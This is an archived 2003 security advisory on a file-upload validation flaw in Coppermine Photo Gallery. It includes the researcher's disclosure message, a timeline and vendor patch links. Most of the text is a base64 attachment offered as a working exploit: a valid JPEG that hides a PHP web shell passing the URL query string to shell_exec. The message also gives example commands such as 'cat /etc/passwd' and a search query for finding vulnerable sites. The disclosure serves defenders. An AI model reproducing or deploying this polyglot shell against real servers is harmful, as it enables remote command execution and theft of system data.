SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Coppermine Photo Gallery Vendors:   DEMAR, Gregory
Coppermine Photo Gallery File Extension Validation Flaw Lets Remote Users Upload and Execute PHP Code
SecurityTracker Alert ID:  1006508
SecurityTracker URL:  http://securitytracker.com/id/1006508
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 7 2003
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.0 RC3 and 1.0 RC1
Description:   A vulnerability was reported in Coppermine Photo Gallery. A remote user can upload PHP code to the server and execute the code.

It is reported that the software attempts to check the file extension to ensure that only files with a valid JPEG file extension are uploaded. However, a remote user with image upload privileges can upload a file with a ".jpg.php" extension.

A remote user can create a valid JPEG file that also contains PHP code and upload the file to the server. Then, the remote user can execute the code with the privileges of the web server.

A demonstration exploit file is provided in the Source Message.

Impact:   A remote user with image uploading privileges can upload arbitrary PHP code to the server and execute it with the privileges of the web server's PHP process.
Solution:   The vendor has released a fixed version (1.1 Beta 2), available at:

http://www.chezgreg.net/coppermine/mod.php?mod=downloads&op=viewdownload&cid=2

The vendor has also issued a patched version of 'db_input.php' for 1.0 versions.

Patch for users of version 1.0RC3:

http://chez.greg.free.fr/downloads/db_input_1.0RC3_patched.zip

Patch for users of version 1.0RC1:

http://chez.greg.free.fr/downloads/db_input_1.0RC1_patched.zip

Vendor URL:  www.chezgreg.net/coppermine/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Coppermine Photo Gallery remote compromise


------=_NextPart_000_0013_01C2FD36.34E63A80
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

---AFFECTED SOFTWARE---
From the website, http://www.chezgreg.net/coppermine/:

"Coppermine Photo Gallery is a picture gallery script. Users can upload
pictures with a web browser (thumbnails are created on the fly), add
comments, send e-cards and view statistics about the pictures. "
"The script use PHP, a MySQL database and the GD library (version 1.x or
2.x) or ImageMagick to make the thumbnails. An install script makes the
installation very fast and easy."

The problem was found in Coppermine 1.0 RC3, the latest stable release. The
latest beta (1.1 beta 2) is not affected according to the author.

---PROMBLEMS---
Coppermine allows the uploading of images onto a server by logged in users
and in a lot of configurations even anonymous uploading. The upload script
has a buggy extention checking routine which allows the uploading of
".jpg.php" files. These files need to be a valid jpg-files or Coppermine
will delete them. It is trivial to create a file which is a valid jpg and
also a valid PHP script. Once uploaded, the PHP script can then be executed,
allowing access to the remote server under the priviledges of the user PHP
is running under.

---EXPLOIT---
Attached is a working exploit, upload this onto a vulnerable server and
execute it like this:
/albums/userpics/Copperminer.jpg.php?[command]
Where command can be something like "id;uname%20-a" or "cat%20/etc/passwd"
Note 1: MSIE will display Copperminer.jpg.php as an image, but lynx will
display the output of the command you gave it.
Note 2: http://www.google.com/search?q=allinurl%3A+/upload.php?album=

---TIMELINE---
mar 31, 2003  - Issue discovered, working exploit written.
mar 31, 2003  - Author contacted, problem aknowledged by author.
apr 05, 2003  - Patches released through Coppermine website.
apr 07, 2003  - Information disclosed.

---PATCH---
Can be found at http://www.chezgreg.net/coppermine/

Kind regards,

Berend-Jan Wever
http://spoor12.edup.tudelft.nl

------=_NextPart_000_0013_01C2FD36.34E63A80
Content-Type: application/octet-stream;
	name="Copperminer.jpg.php"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="Copperminer.jpg.php"

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
YpjKUjKJZzZQ2LjLlzpzKVTcGR6cgyIftsI3R9R+NG1Xr0paDYjifdH8u9er+4xCDKwAgNu1I4d6
/DI+T4zKXZ+hXnJMm7K5ETeJQN6UdR6JEfdPgnxMSQj91XBIygch2uo6o/qPU9LEpJqH5oHClXQV
AnNuRALzI4QiD9QTTIi2eiJhWMKOjI2SQw4ESlI5MgQB0eKGpPMiIsqpTBF0ksUZgvEAmmhMT6eD
Hv8An3BRwokDIAhKQJctRG7S/GiuzADZ0IYbE6FIml5Rw4SvSvVbMxRA+6E8yItnUpxskSyc2NHz
XpwN6ciAwyDK/YnOQEnxRMQRdzomVlP0ssSOGb0hEjtILLjIi2dSxI8sjTsiB5IzP1N4MhhxkDMk
UCuZwO4v5JpsCM6u4dToR+PpURoH6ii1tPEIXyyBkCb2ZSkPqgTtiu3yCIzf9VHVH9R6jyiCc+VP
EAKIan8leMQ46OIOrsAIjQmIdXxEXs6aVQmCuzF4W1TCIAVxuHNrTCIAQkYhxUFATAkBWqYUAVQn
jEAriDpxEOcqZViFwgBVFGHmrwiL2dEGwpoARGhVDo3Qz2qoXCANSYh04iHzpguILgiArzcWdXiK
5+isQhfAk1jq7kZm0JohgrzcWdXiK5/4r//ZLS0+PEhUTUw+CjxIRUFEPjxUSVRMRT5Db3BwZXJt
aW5lciBieSBTa3lMaW5lZCAtIHNwb29yMTIuZWR1cC50dWRlbGZ0Lm5sPC9USVRMRT48L0hFQUQ+
CjxCT0RZPjw/cGhwCiAgJGNvbW1hbmQgPSByYXd1cmxkZWNvZGUoaXNzZXQoJFFVRVJZX1NUUklO
RykgPyAkUVVFUllfU1RSSU5HIDogJF9TRVJWRVJbJ1FVRVJZX1NUUklORyddKTsKICBlY2hvICI8
SFI+PEgxPiIuJGNvbW1hbmQuIjwvSDE+PEhSPiI7CiAgZWNobyAiPFBSRT4iLnNoZWxsX2V4ZWMo
ICRjb21tYW5kICkuIjwvUFJFPiI7Cj8+PC9CT0RZPgo8L0hUTUw+

------=_NextPart_000_0013_01C2FD36.34E63A80--



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC